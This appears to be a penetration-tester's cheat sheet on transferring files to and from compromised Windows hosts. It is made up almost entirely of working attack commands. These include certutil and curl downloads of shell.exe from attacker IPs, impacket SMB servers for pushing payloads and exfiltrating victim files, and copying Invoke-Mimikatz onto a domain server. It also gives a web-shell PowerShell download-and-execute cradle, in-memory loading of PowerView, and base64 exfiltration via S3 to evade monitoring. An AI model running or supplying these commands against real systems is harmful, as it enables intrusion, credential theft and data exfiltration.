File Transfer

ZIP Files

HFS -GUI Based Tool

Command-line based

certutil -urlcache -split -f http://10.10.14.3/shell.exe C:\\users\\public\\shell.exe
certutil -urlcache -split -f http://10.10.14.3/shell.exe C:\shell.exe & shell.exe

curl http://<URL/file.exe --output file.exe

#winrm
upload /home/kali/Tools/Windows/nc.exe

#Powershell remoting
Copy-Item -ToSession $appsrv1 -Pathfile_to_copy.exe -Destination C:\Users\appadmin\Downloads

Via SMB

  • Attacker -- > Victim

#Attacker's System
#Shares current directory
sudo impacket-smbserver shared . 
sudo smbserver.py -smb2support Data $(pwd)

sudo python3 /opt/impacket/examples/smbserver.py share . -smb2support -username user -password s3cureP@ssword
net use \\ATTACKER_IP\share /USER:user s3cureP@ssword 

#Disconnect
net use \\ATTACKER_IP\share /del

#Victim's System
copy \\10.10.14.15\shared\exploit.exe c:\users\public\file.exe

#Metasploit's smb_delivery

systemctl start smbd
#/etc/samba/smb.conf
[blue]
    comment = hello
    path = /home/kali/shareddir
    guest ok = yes
    browsable = yes
    read only = no
    
#Powershell
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
  • Victim -- > Attacker

#1#Attacker
impacket-smbserver pub `pwd`
sudo smbserver.py -smb2support Data $(pwd) -user kali -password mypass

#Victim: Powershell
net use z: \\192.168.119.174\pub /user:kali mypass
net use z: \\192.168.119.174\pub
cp "File name.txt" z:

net z: /delete

#2#Attacker
sudo impacket-smbserver shared $(pwd) -smb2support -username kali -password mypass

#Victim
$pass= convertto-securestring 'mypass' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('kali',$pass)
New-PSDrive -Name "shared" -PSProvider "Filesystem" -Root "\\192.168.42.42\shared" -Credential $cred 
net use z: \\192.168.42.42\shared

#List mounted shares
Powershell: Get-SMBShare
Without Powershell: net share

Troubleshooting Common Errors

Via Web Server

url.com/exploit.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.40/PowerUp.ps1"); | powershell -noprofile -

powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.2:8000/PowerView.ps1'); 
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<Source-IP/File>', '<Destination directory>')"

(new-object net.webclient).downloadfile('http://<Source-IP/File>', '<Destination directory>')

Invoke-WebRequest -Uri "http://<Source-IP/File>" -OutFile "PowerView.ps1"

#Execute in memory
IEX(iwr http://<IP>/PowerView.ps1 -UseBasicParsing) 

Exfil using Base64

Downloading Files Onto Compromised Host

S3 Bucket

  • Encode the file using certutil. certutil.exe -encode file.exe file.txt

  • Host the file on an S3 Bucket.

  • Access the file on using AWS S3 Bucket. Copy the content to a .txt file

  • Decode the file. certutil.exe -decode file.txt file.exe

    • Use powershell as cmd may be monitored.

RDP

If we have access to a windows machine with a valid user/credentials and this user is in the “Remote Desktop Users”, we can share a local directories as a mount volume through rdp itself once we connect to the machine:

rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries 192.168.30.30 -u pelota -p /dynamic-resolution
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.138.3 /workarea /drive:/localdir,share /dynamic-resolution +clipboard

Last updated